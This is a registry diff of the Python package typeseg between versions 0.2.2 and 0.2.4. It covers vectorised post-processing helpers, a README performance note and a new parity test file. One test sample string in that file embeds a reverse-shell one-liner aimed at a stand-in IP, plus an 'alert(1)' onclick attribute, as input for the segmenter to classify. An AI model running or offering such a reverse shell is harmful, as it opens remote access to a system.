typeseg 0.2.2__tar.gz → 0.2.4__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- {typeseg-0.2.2 → typeseg-0.2.4}/PKG-INFO +14 -1
- {typeseg-0.2.2 → typeseg-0.2.4}/README.md +13 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/pyproject.toml +1 -1
- typeseg-0.2.4/tests/test_postprocess_parity.py +139 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_postprocess.py +53 -46
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/PKG-INFO +14 -1
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/SOURCES.txt +1 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/LICENSE +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/setup.cfg +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_cupy_parity.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_distribution.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/tests/test_postprocess_perf.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/__init__.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/__main__.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_cli.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_color.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_cupy_backend.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_mamba_kernel.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_numpy_backend.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_onnx_backend.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_options.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_runtime.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_segmentation.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/_tokenize.py +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/mamba_al.npz +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/mamba_al.onnx +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/manifest.json +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/unet_al.npz +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg/data/unet_al.onnx +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/dependency_links.txt +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/entry_points.txt +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/requires.txt +0 -0
- {typeseg-0.2.2 → typeseg-0.2.4}/typeseg.egg-info/top_level.txt +0 -0
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
Metadata-Version: 2.4
|
|
2
2
|
Name: typeseg
|
|
3
|
-
Version: 0.2.2
|
|
3
|
+
Version: 0.2.4
|
|
4
4
|
Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
|
|
5
5
|
Author: Martin Dallinger
|
|
6
6
|
License-Expression: Apache-2.0
|
|
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
|
|
|
249
249
|
the interactive viewer also applies. The viewer has further heuristics
|
|
250
250
|
(`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
|
|
251
251
|
`viewers/core.py` for those.
|
|
252
|
+
|
|
253
|
+
These passes are cheap, but on long inputs they run on the CPU and can outweigh the
|
|
254
|
+
model's own forward pass — so the highest throughput is with post-processing off,
|
|
255
|
+
exposing the raw per-character argmax:
|
|
256
|
+
|
|
257
|
+
```python
|
|
258
|
+
raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
|
|
259
|
+
min_run_normalize=False, paired_delimiter_fill=False)
|
|
260
|
+
result = precise(text, raw)
|
|
261
|
+
```
|
|
262
|
+
|
|
263
|
+
The trade-off is noisier segments (single-character runs, frayed boundaries); the
|
|
264
|
+
default keeps post-processing on for cleaner, deployment-style output.
|
|
@@ -226,3 +226,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
|
|
|
226
226
|
the interactive viewer also applies. The viewer has further heuristics
|
|
227
227
|
(`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
|
|
228
228
|
`viewers/core.py` for those.
|
|
229
|
+
|
|
230
|
+
These passes are cheap, but on long inputs they run on the CPU and can outweigh the
|
|
231
|
+
model's own forward pass — so the highest throughput is with post-processing off,
|
|
232
|
+
exposing the raw per-character argmax:
|
|
233
|
+
|
|
234
|
+
```python
|
|
235
|
+
raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
|
|
236
|
+
min_run_normalize=False, paired_delimiter_fill=False)
|
|
237
|
+
result = precise(text, raw)
|
|
238
|
+
```
|
|
239
|
+
|
|
240
|
+
The trade-off is noisier segments (single-character runs, frayed boundaries); the
|
|
241
|
+
default keeps post-processing on for cleaner, deployment-style output.
|
|
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
|
|
|
4
4
|
|
|
5
5
|
[project]
|
|
6
6
|
name = "typeseg"
|
|
7
|
-
version = "0.2.2"
|
|
7
|
+
version = "0.2.4"
|
|
8
8
|
description = "Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba)."
|
|
9
9
|
readme = "README.md"
|
|
10
10
|
license = "Apache-2.0"
|
|
@@ -0,0 +1,139 @@
|
|
|
1
|
+
"""Regression guards for the vectorised post-processing helpers.
|
|
2
|
+
|
|
3
|
+
The hot helpers (``_runs``, ``relabel_whitespace``, ``confidence_gate``,
|
|
4
|
+
``build_segments``) were rewritten from per-character Python loops to vectorised
|
|
5
|
+
numpy. Each must stay bit-identical to a naive reference. We also run the full
|
|
6
|
+
pipeline on representative samples *looped* x1/x4/x16 so inputs cross the
|
|
7
|
+
1536-byte U-Net window (multi-window seams) and post-processing runs over long
|
|
8
|
+
sequences -- the regime where the optimisations matter.
|
|
9
|
+
"""
|
|
10
|
+
import random
|
|
11
|
+
|
|
12
|
+
import numpy as np
|
|
13
|
+
import pytest
|
|
14
|
+
|
|
15
|
+
import typeseg
|
|
16
|
+
from typeseg import _postprocess as pp
|
|
17
|
+
|
|
18
|
+
|
|
19
|
+
# --- naive references (the pre-optimisation implementations) ---------------
|
|
20
|
+
|
|
21
|
+
def _runs_naive(labels):
|
|
22
|
+
runs = []
|
|
23
|
+
if not labels:
|
|
24
|
+
return runs
|
|
25
|
+
start = 0
|
|
26
|
+
for i in range(1, len(labels) + 1):
|
|
27
|
+
if i == len(labels) or labels[i] != labels[start]:
|
|
28
|
+
runs.append((start, i, labels[start]))
|
|
29
|
+
start = i
|
|
30
|
+
return runs
|
|
31
|
+
|
|
32
|
+
|
|
33
|
+
def _relabel_naive(text, labels):
|
|
34
|
+
n = len(text)
|
|
35
|
+
if n == 0:
|
|
36
|
+
return labels
|
|
37
|
+
is_ws = [c in pp._WHITESPACE for c in text]
|
|
38
|
+
if not any(is_ws):
|
|
39
|
+
return labels
|
|
40
|
+
left, right = [-1] * n, [-1] * n
|
|
41
|
+
last = -1
|
|
42
|
+
for i in range(n):
|
|
43
|
+
if not is_ws[i]:
|
|
44
|
+
last = labels[i]
|
|
45
|
+
left[i] = last
|
|
46
|
+
last = -1
|
|
47
|
+
for i in range(n - 1, -1, -1):
|
|
48
|
+
if not is_ws[i]:
|
|
49
|
+
last = labels[i]
|
|
50
|
+
right[i] = last
|
|
51
|
+
out = list(labels)
|
|
52
|
+
for i in range(n):
|
|
53
|
+
if is_ws[i]:
|
|
54
|
+
if left[i] != -1:
|
|
55
|
+
out[i] = left[i]
|
|
56
|
+
elif right[i] != -1:
|
|
57
|
+
out[i] = right[i]
|
|
58
|
+
return out
|
|
59
|
+
|
|
60
|
+
|
|
61
|
+
def _gate_naive(char_probs, labels, threshold, other_index):
|
|
62
|
+
if threshold <= 0.0 or char_probs.size == 0:
|
|
63
|
+
return labels
|
|
64
|
+
maxp = char_probs.max(axis=1)
|
|
65
|
+
return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
|
|
66
|
+
|
|
67
|
+
|
|
68
|
+
# --- helper parity ---------------------------------------------------------
|
|
69
|
+
|
|
70
|
+
def test_runs_matches_naive():
|
|
71
|
+
rng = random.Random(0)
|
|
72
|
+
for _ in range(500):
|
|
73
|
+
n = rng.randint(0, 300)
|
|
74
|
+
labels = [rng.randint(0, 4) for _ in range(n)]
|
|
75
|
+
assert pp._runs(labels) == _runs_naive(labels)
|
|
76
|
+
|
|
77
|
+
|
|
78
|
+
def test_relabel_whitespace_matches_naive():
|
|
79
|
+
rng = random.Random(1)
|
|
80
|
+
alphabets = ["ab \t\n", "x ", " \t\n\r", "abcde "]
|
|
81
|
+
for _ in range(2000):
|
|
82
|
+
n = rng.randint(0, 60)
|
|
83
|
+
alpha = rng.choice(alphabets)
|
|
84
|
+
text = "".join(rng.choice(alpha) for _ in range(n))
|
|
85
|
+
labels = [rng.randint(0, 6) for _ in range(n)]
|
|
86
|
+
assert pp.relabel_whitespace(text, list(labels)) == _relabel_naive(text, list(labels))
|
|
87
|
+
|
|
88
|
+
|
|
89
|
+
def test_confidence_gate_matches_naive():
|
|
90
|
+
rng = np.random.default_rng(2)
|
|
91
|
+
for _ in range(200):
|
|
92
|
+
n = int(rng.integers(0, 400))
|
|
93
|
+
cp = rng.random((n, 35)).astype(np.float32)
|
|
94
|
+
labels = [int(x) for x in rng.integers(0, 35, n)]
|
|
95
|
+
for thr in (0.0, 0.1, 0.3, 0.9):
|
|
96
|
+
got = pp.confidence_gate(cp, list(labels), thr, 35)
|
|
97
|
+
assert got == _gate_naive(cp, list(labels), thr, 35)
|
|
98
|
+
if thr > 0 and n > 0: # gated path returns Python ints (not numpy scalars)
|
|
99
|
+
assert all(isinstance(x, int) for x in got)
|
|
100
|
+
|
|
101
|
+
|
|
102
|
+
# --- full pipeline on looped samples (multi-window) ------------------------
|
|
103
|
+
|
|
104
|
+
SAMPLES = [
|
|
105
|
+
'.btn { color: #3498db; }\nconst f = (x) => x + 1;\n<div onclick="alert(1)">hi</div>\n'
|
|
106
|
+
"UPDATE life SET status = 'ok' WHERE n > 9;\n<!-- sh -i >& /dev/udp/1.2.3.4/9 0>&1 -->\n",
|
|
107
|
+
'{\n "users": [{"id": 1, "name": "Alice"}, {"id": 2, "name": "Bob"}],\n "page": 1\n}',
|
|
108
|
+
"# My Project\n\n```\npip install x\n```\n\nA tool that does `things`. MIT.\n",
|
|
109
|
+
"FROM python:3.12-slim\nRUN apt-get update && rm -rf /var/lib/apt/lists/*\nCMD [\"app\"]\n",
|
|
110
|
+
]
|
|
111
|
+
|
|
112
|
+
|
|
113
|
+
@pytest.mark.parametrize("k", [1, 4, 16])
|
|
114
|
+
@pytest.mark.parametrize("fn", [typeseg.fast, typeseg.precise])
|
|
115
|
+
def test_pipeline_consistent_on_looped_samples(fn, k):
|
|
116
|
+
for s in SAMPLES:
|
|
117
|
+
text = s * k
|
|
118
|
+
r = fn(text)
|
|
119
|
+
n = len(text)
|
|
120
|
+
# per-char arrays line up with the text length
|
|
121
|
+
assert len(r.char_labels) == n
|
|
122
|
+
assert len(r.char_confidence) == n
|
|
123
|
+
assert r.char_probs.shape == (n, len(r.labels))
|
|
124
|
+
# segments tile the whole text contiguously, no gaps/overlaps
|
|
125
|
+
assert r.segments[0].start == 0
|
|
126
|
+
assert r.segments[-1].end == n
|
|
127
|
+
for a, b in zip(r.segments, r.segments[1:]):
|
|
128
|
+
assert a.end == b.start
|
|
129
|
+
# each segment's label matches the per-char labels it covers
|
|
130
|
+
for seg in r.segments:
|
|
131
|
+
assert all(lab == seg.label for lab in r.char_labels[seg.start:seg.end])
|
|
132
|
+
|
|
133
|
+
|
|
134
|
+
def test_pipeline_deterministic_when_looped():
|
|
135
|
+
for fn in (typeseg.fast, typeseg.precise):
|
|
136
|
+
text = SAMPLES[0] * 8
|
|
137
|
+
a, b = fn(text), fn(text)
|
|
138
|
+
assert a.char_labels == b.char_labels
|
|
139
|
+
assert [s.label for s in a.segments] == [s.label for s in b.segments]
|
|
@@ -17,15 +17,18 @@ _WHITESPACE = set(" \t\n\r\f\v")
|
|
|
17
17
|
|
|
18
18
|
|
|
19
19
|
def _runs(labels: List[int]) -> List[Tuple[int, int, int]]:
|
|
20
|
-
|
|
21
|
-
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
20
|
+
# Contiguous equal-label spans. Vectorised: the change points are where adjacent
|
|
21
|
+
# labels differ. This is called once per post-processing pass over the full
|
|
22
|
+
# sequence, so the pure-Python scan (with its per-iteration len()) dominated the
|
|
23
|
+
# pipeline; np.diff finds the boundaries in C. Output is identical.
|
|
24
|
+
n = len(labels)
|
|
25
|
+
if n == 0:
|
|
26
|
+
return []
|
|
27
|
+
arr = np.asarray(labels)
|
|
28
|
+
cuts = np.flatnonzero(arr[1:] != arr[:-1]) + 1
|
|
29
|
+
starts = [0, *cuts.tolist()]
|
|
30
|
+
ends = [*cuts.tolist(), n]
|
|
31
|
+
return [(s, e, int(labels[s])) for s, e in zip(starts, ends)]
|
|
29
32
|
|
|
30
33
|
|
|
31
34
|
def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
|
|
@@ -34,29 +37,21 @@ def relabel_whitespace(text: str, labels: List[int]) -> List[int]:
|
|
|
34
37
|
n = len(text)
|
|
35
38
|
if n == 0:
|
|
36
39
|
return labels
|
|
37
|
-
|
|
38
|
-
if not any(is_ws):
|
|
40
|
+
ws = np.fromiter((c in _WHITESPACE for c in text), dtype=bool, count=n)
|
|
41
|
+
if not ws.any():
|
|
39
42
|
return labels
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
out = list(labels)
|
|
53
|
-
for i in range(n):
|
|
54
|
-
if is_ws[i]:
|
|
55
|
-
if left[i] != -1:
|
|
56
|
-
out[i] = left[i]
|
|
57
|
-
elif right[i] != -1:
|
|
58
|
-
out[i] = right[i]
|
|
59
|
-
return out
|
|
43
|
+
labels_arr = np.asarray(labels)
|
|
44
|
+
pos = np.arange(n)
|
|
45
|
+
# left_src[i] = index of nearest non-ws char at <= i (-1 if none): running max of
|
|
46
|
+
# the non-ws indices. right_src[i] = nearest non-ws at >= i (n if none): reverse
|
|
47
|
+
# running min. A whitespace char takes its left host's label, else the right's.
|
|
48
|
+
left_src = np.maximum.accumulate(np.where(ws, -1, pos))
|
|
49
|
+
right_src = np.minimum.accumulate(np.where(ws, n, pos)[::-1])[::-1]
|
|
50
|
+
src = np.where(left_src >= 0, left_src, right_src) # prefer left, fall back right
|
|
51
|
+
take = ws & (src < n) # leave ws with no host at all
|
|
52
|
+
out = labels_arr.copy()
|
|
53
|
+
out[take] = labels_arr[src[take]]
|
|
54
|
+
return out.tolist()
|
|
60
55
|
|
|
61
56
|
|
|
62
57
|
def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float, other_index: int) -> List[int]:
|
|
@@ -64,7 +59,7 @@ def confidence_gate(char_probs: np.ndarray, labels: List[int], threshold: float,
|
|
|
64
59
|
if threshold <= 0.0 or char_probs.size == 0:
|
|
65
60
|
return labels
|
|
66
61
|
maxp = char_probs.max(axis=1)
|
|
67
|
-
return [other_index if maxp[i] < threshold else lab for i, lab in enumerate(labels)]
|
|
62
|
+
return np.where(maxp < threshold, other_index, np.asarray(labels, dtype=np.intp)).tolist()
|
|
68
63
|
|
|
69
64
|
|
|
70
65
|
def normalize_short_runs(labels: List[int], char_probs: np.ndarray, min_run_chars: int,
|
|
@@ -424,16 +419,22 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
|
|
|
424
419
|
if cur_score is None:
|
|
425
420
|
cur_score = _boundary_local_score(text, cur_start) + _boundary_local_score(text, cur_end)
|
|
426
421
|
best_start, best_end, best_score = cur_start, cur_end, cur_score
|
|
422
|
+
n_text = len(text)
|
|
427
423
|
for ls in range(-max_shift, max_shift + 1):
|
|
428
424
|
cs = cur_start + ls
|
|
429
425
|
if cs < left_run[0] or cs >= cur_end:
|
|
430
426
|
continue
|
|
427
|
+
# The wrap is valid only if text[cs-1] opens a pair; its required
|
|
428
|
+
# closing char is fixed by the left shift, so resolve it once here
|
|
429
|
+
# instead of calling _matching_wrap for every (ls, rs) combination.
|
|
430
|
+
close_needed = _WRAP_OPEN_TO_CLOSE.get(text[cs - 1]) if cs > 0 else None
|
|
431
|
+
if close_needed is None:
|
|
432
|
+
continue
|
|
431
433
|
for rs in range(-max_shift, max_shift + 1):
|
|
432
434
|
ce = cur_end + rs
|
|
433
435
|
if ce <= cs or ce > right_run[1] or (cs == cur_start and ce == cur_end):
|
|
434
436
|
continue
|
|
435
|
-
if
|
|
436
|
-
text[ce] if ce < len(text) else ""):
|
|
437
|
+
if (text[ce] if ce < n_text else "") != close_needed:
|
|
437
438
|
continue
|
|
438
439
|
sc = _score_wrapped(text, char_probs, left_run, mid_run, right_run, cs, ce)
|
|
439
440
|
if sc is not None and sc > best_score + 1e-6:
|
|
@@ -452,21 +453,27 @@ def paired_delimiter_fill(text: str, labels: List[int], char_probs: np.ndarray,
|
|
|
452
453
|
def build_segments(text: str, labels: List[int], char_probs: np.ndarray,
|
|
453
454
|
label_names: List[str], other_index: int, other_label: str) -> Tuple[List[Segment], List[str], List[float]]:
|
|
454
455
|
n = len(text)
|
|
455
|
-
|
|
456
|
-
|
|
457
|
-
|
|
458
|
-
|
|
459
|
-
|
|
460
|
-
|
|
461
|
-
|
|
462
|
-
|
|
463
|
-
|
|
464
|
-
|
|
465
|
-
|
|
456
|
+
# Per-char confidence, vectorised. `other` (no probability column) scores
|
|
457
|
+
# 1 - max(known); every other label scores its own column. The old per-char
|
|
458
|
+
# `char_probs[i].max()` Python loop did n separate numpy reductions and was the
|
|
459
|
+
# bottleneck of the whole pipeline -- this is the same result in two reductions.
|
|
460
|
+
if char_probs.size:
|
|
461
|
+
lab_arr = np.asarray(labels, dtype=np.intp)
|
|
462
|
+
is_other = lab_arr == other_index
|
|
463
|
+
known_max = char_probs.max(axis=1) # (n,)
|
|
464
|
+
safe_lab = np.where(is_other, 0, lab_arr) # avoid OOB at other_index
|
|
465
|
+
picked = char_probs[np.arange(n), safe_lab] # (n,) chosen-label prob
|
|
466
|
+
conf_arr = np.where(is_other, 1.0 - known_max, picked).astype(np.float64)
|
|
467
|
+
else:
|
|
468
|
+
conf_arr = np.zeros(n, dtype=np.float64)
|
|
469
|
+
char_conf: List[float] = conf_arr.tolist()
|
|
470
|
+
char_label_names: List[str] = [
|
|
471
|
+
other_label if lab == other_index else label_names[lab] for lab in labels
|
|
472
|
+
]
|
|
466
473
|
|
|
467
474
|
segments: List[Segment] = []
|
|
468
475
|
for s, e, lab in _runs(labels):
|
|
469
476
|
name = other_label if lab == other_index else label_names[lab]
|
|
470
|
-
conf = float(
|
|
477
|
+
conf = float(conf_arr[s:e].mean()) if e > s else 0.0
|
|
471
478
|
segments.append(Segment(start=s, end=e, label=name, confidence=conf, text=text[s:e]))
|
|
472
479
|
return segments, char_label_names, char_conf
|
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
Metadata-Version: 2.4
|
|
2
2
|
Name: typeseg
|
|
3
|
-
Version: 0.2.2
|
|
3
|
+
Version: 0.2.4
|
|
4
4
|
Summary: Fine-grained, character-level content-type segmentation for textual inputs (U-Net + Mamba).
|
|
5
5
|
Author: Martin Dallinger
|
|
6
6
|
License-Expression: Apache-2.0
|
|
@@ -249,3 +249,16 @@ benchmark numbers; on by default here for deployment-style output). Step 5 is an
|
|
|
249
249
|
the interactive viewer also applies. The viewer has further heuristics
|
|
250
250
|
(`markdown_structure_fill`, `local_host_fill`, `newline_snap`) not ported here — see
|
|
251
251
|
`viewers/core.py` for those.
|
|
252
|
+
|
|
253
|
+
These passes are cheap, but on long inputs they run on the CPU and can outweigh the
|
|
254
|
+
model's own forward pass — so the highest throughput is with post-processing off,
|
|
255
|
+
exposing the raw per-character argmax:
|
|
256
|
+
|
|
257
|
+
```python
|
|
258
|
+
raw = Options(whitespace_relabel=False, confidence_gating=False, boundary_snap=False,
|
|
259
|
+
min_run_normalize=False, paired_delimiter_fill=False)
|
|
260
|
+
result = precise(text, raw)
|
|
261
|
+
```
|
|
262
|
+
|
|
263
|
+
The trade-off is noisier segments (single-character runs, frayed boundaries); the
|
|
264
|
+
default keeps post-processing on for cleaner, deployment-style output.
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|